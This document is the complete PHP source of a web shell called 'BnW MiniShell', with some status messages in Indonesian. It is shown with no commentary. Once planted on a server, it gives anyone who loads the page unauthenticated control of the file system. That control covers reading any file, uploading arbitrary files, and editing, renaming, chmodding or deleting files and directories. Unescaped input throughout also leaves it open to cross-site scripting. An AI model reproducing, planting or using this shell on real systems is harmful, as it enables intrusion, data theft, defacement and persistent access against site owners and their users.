BnW MiniShell

1. ?i�?<?php
2. @session_start();
3. @set_time_limit(0);
4.  
5. echo '<!DOCTYPE HTML>
6. <HTML>
7. <HEAD>
8. <title></title>
9. <style>
10. body{
11. font-family: monospace;
12. font-weight: bold;
13. font-size: 18px;
14. background-color: #c5c5c5;
15. color: #000;
16. }
17. #content tr:hover{
18. background-color: #ccc;
19. }
20. #content .first{
21. background-color: #ccc;
22. }
23. #content .first:hover{
24. background-color: #ccc;
25. }
26. table{
27. border: 3px #000 solid;
28. }
29. a{
30. color: #000;
31. text-decoration: none;
32. }
33. a:hover{
34. color: #00f;
35. }
36. input,select,textarea{
37. border: 1px #000 solid;
38. -moz-border-radius: 5px;
39. -webkit-border-radius:5px;
40. border-radius:5px;
41. }
42. input {
43. font-size: 18px;
44. font-weight: bold;
45. padding: 5px;
46. }
47. select {
48. font-size: 19px
49. }
50. textarea {
51. font-size: 10px
52. }
53. td, tr { padding: 2px 5px; }
54.  
55. </style>
56. </HEAD>
57. <BODY>
58. <hr width="920" color="black"/>
59. <hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
60. <hr width="920" color="black"/>
61. <table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
62. <tr><td style="padding: 8px">Current Path : ';
63. if(isset($_GET['path'])){
64. $path = $_GET['path'];
65. }else{
66. $path = getcwd();
67. }
68. $path = str_replace('\\','/',$path);
69. $paths = explode('/',$path);
70.  
71. foreach($paths as $id=>$pat){
72. if($pat == '' && $id == 0){
73. $a = true;
74. echo '<a href="?path=/">/</a>';
75. continue;
76. }
77. if($pat == '') continue;
78. echo '<a href="?path=';
79. for($i=0;$i<=$id;$i++){
80. echo "$paths[$i]";
81. if($i != $id) echo "/";
82. }
83. echo '">'.$pat.'</a>/';
84. }
85. echo '</td></tr><tr><td>';
86. if(isset($_FILES['file'])){
87. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
88. echo '<font color="green">Upload Success..</font><br />';
89. }else{
90. echo '<font color="red">Upload Gagal..</font><br />';
91. }
92. }
93. echo '<form enctype="multipart/form-data" method="POST">
94. Upload File : <input type="file" name="file" />
95. <input type="submit" value="Upload" />
96. </form>
97. </td></tr>';
98. if(isset($_GET['filesrc'])){
99. echo "<tr><td style='padding: 8px'>Current File : ";
100. echo $_GET['filesrc'];
101. echo '</tr></td></table><br />';
102. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
103. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
104. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
105. if($_POST['opt'] == 'chmod'){
106. if(isset($_POST['perm'])){
107. if(chmod($_POST['path'],$_POST['perm'])){
108. echo '<font color="green">Chmod Success..</font><br />';
109. }else{
110. echo '<font color="red">Chmod Gagal..</font><br />';
111. }
112. }
113. echo '<form method="POST">
114. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
115. <input type="hidden" name="path" value="'.$_POST['path'].'">
116. <input type="hidden" name="opt" value="chmod">
117. <input type="submit" value="Save" />
118. </form>';
119. }elseif($_POST['opt'] == 'rename'){
120. if(isset($_POST['newname'])){
121. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
122. echo '<font color="green">Rename Berhasil..</font><br />';
123. }else{
124. echo '<font color="red">Rename Gagal..</font><br />';
125. }
126. $_POST['name'] = $_POST['newname'];
127. }
128. echo '<form method="POST">
129. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
130. <input type="hidden" name="path" value="'.$_POST['path'].'">
131. <input type="hidden" name="opt" value="rename">
132. <input type="submit" value="Save" />
133. </form>';
134. }elseif($_POST['opt'] == 'edit'){
135. if(isset($_POST['src'])){
136. $fp = fopen($_POST['path'],'w');
137. if(fwrite($fp,$_POST['src'])){
138. echo '<font color="green">Edit File Berhasil..</font><br />';
139. }else{
140. echo '<font color="red">Edit File Gagal..</font><br />';
141. }
142. fclose($fp);
143. }
144. echo '<form method="POST">
145. <textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
146. <input type="hidden" name="path" value="'.$_POST['path'].'">
147. <input type="hidden" name="opt" value="edit">
148. <input type="submit" value="Save" />
149. </form>';
150. }
151. echo '</center>';
152. }else{
153. echo '</table><br /><center>';
154. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
155. if($_POST['type'] == 'dir'){
156. if(rmdir($_POST['path'])){
157. echo '<font color="green">Delete Directory Berhasil..</font><br />';
158. }else{
159. echo '<font color="red">Delete Directory Gagal..</font><br />';
160. }
161. }elseif($_POST['type'] == 'file'){
162. if(unlink($_POST['path'])){
163. echo '<font color="green">Delete File Berhasil..</font><br />';
164. }else{
165. echo '<font color="red">Delete File Gagal..</font><br />';
166. }
167. }
168. }
169. echo '</center>';
170. $scandir = scandir($path);
171. echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
172. <tr class="first">
173. <td><center>Name</center></td>
174. <td><center>Size</center></td>
175. <td><center>Permissions</center></td>
176. <td><center>Options</center></td>
177. </tr>';
178.  
179. foreach($scandir as $dir){
180. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
181. echo "<tr>
182. <td><a href=\"?path=$path/$dir\">$dir</a></td>
183. <td><center>--</center></td>
184. <td><center>";
185. if(is_writable("$path/$dir")) echo '<font color="Blue">';
186. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
187. echo perms("$path/$dir");
188. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
189.  
190. echo "</center></td>
191. <td><center><form method=\"POST\" action=\"?option&path=$path\">
192. <select name=\"opt\">
193. <option value=\"\"></option>
194. <option value=\"delete\">Delete</option>
195. <option value=\"chmod\">Chmod</option>
196. <option value=\"rename\">Rename</option>
197. </select>
198. <input type=\"hidden\" name=\"type\" value=\"dir\">
199. <input type=\"hidden\" name=\"name\" value=\"$dir\">
200. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
201. <input type=\"submit\" value=\"Oke\" />
202. </form></center></td>
203. </tr>";
204. }
205. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
206. foreach($scandir as $file){
207. if(!is_file("$path/$file")) continue;
208. $size = filesize("$path/$file")/1024;
209. $size = round($size,3);
210. if($size >= 1024){
211. $size = round($size/1024,2).' MB';
212. }else{
213. $size = $size.' KB';
214. }
215.  
216. echo "<tr>
217. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
218. <td><center>".$size."</center></td>
219. <td><center>";
220. if(is_writable("$path/$file")) echo '<font color="Blue">';
221. elseif(!is_readable("$path/$file")) echo '<font color="red">';
222. echo perms("$path/$file");
223. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
224. echo "</center></td>
225. <td><center><form method=\"POST\" action=\"?option&path=$path\">
226. <select name=\"opt\">
227. <option value=\"\"></option>
228. <option value=\"delete\">Delete</option>
229. <option value=\"chmod\">Chmod</option>
230. <option value=\"rename\">Rename</option>
231. <option value=\"edit\">Edit</option>
232. </select>
233. <input type=\"hidden\" name=\"type\" value=\"file\">
234. <input type=\"hidden\" name=\"name\" value=\"$file\">
235. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
236. <input type=\"submit\" value=\"Oke\" />
237. </form></center></td>
238. </tr>";
239. }
240. echo '</table>
241. </div>';
242. }
243. echo '<center><hr width="920" color="black"/> <center>
244. </BODY>
245. </HTML>';
246. function perms($file){
247. $perms = fileperms($file);
248.  
249. if (($perms & 0xC000) == 0xC000) {
250. // Socket
251. $info = 's';
252. } elseif (($perms & 0xA000) == 0xA000) {
253. // Symbolic Link
254. $info = 'l';
255. } elseif (($perms & 0x8000) == 0x8000) {
256. // Regular
257. $info = '-';
258. } elseif (($perms & 0x6000) == 0x6000) {
259. // Block special
260. $info = 'b';
261. } elseif (($perms & 0x4000) == 0x4000) {
262. // Directory
263. $info = 'd';
264. } elseif (($perms & 0x2000) == 0x2000) {
265. // Character special
266. $info = 'c';
267. } elseif (($perms & 0x1000) == 0x1000) {
268. // FIFO pipe
269. $info = 'p';
270. } else {
271. // Unknown
272. $info = 'u';
273. }
274.  
275. // Owner
276. $info .= (($perms & 0x0100) ? 'r' : '-');
277. $info .= (($perms & 0x0080) ? 'w' : '-');
278. $info .= (($perms & 0x0040) ?
279. (($perms & 0x0800) ? 's' : 'x' ) :
280. (($perms & 0x0800) ? 'S' : '-'));
281.  
282. // Group
283. $info .= (($perms & 0x0020) ? 'r' : '-');
284. $info .= (($perms & 0x0010) ? 'w' : '-');
285. $info .= (($perms & 0x0008) ?
286. (($perms & 0x0400) ? 's' : 'x' ) :
287. (($perms & 0x0400) ? 'S' : '-'));
288.  
289. // World
290. $info .= (($perms & 0x0004) ? 'r' : '-');
291. $info .= (($perms & 0x0002) ? 'w' : '-');
292. $info .= (($perms & 0x0001) ?
293. (($perms & 0x0200) ? 't' : 'x' ) :
294. (($perms & 0x0200) ? 'T' : '-'));
295.  
296. return $info;
297. }
298. ?>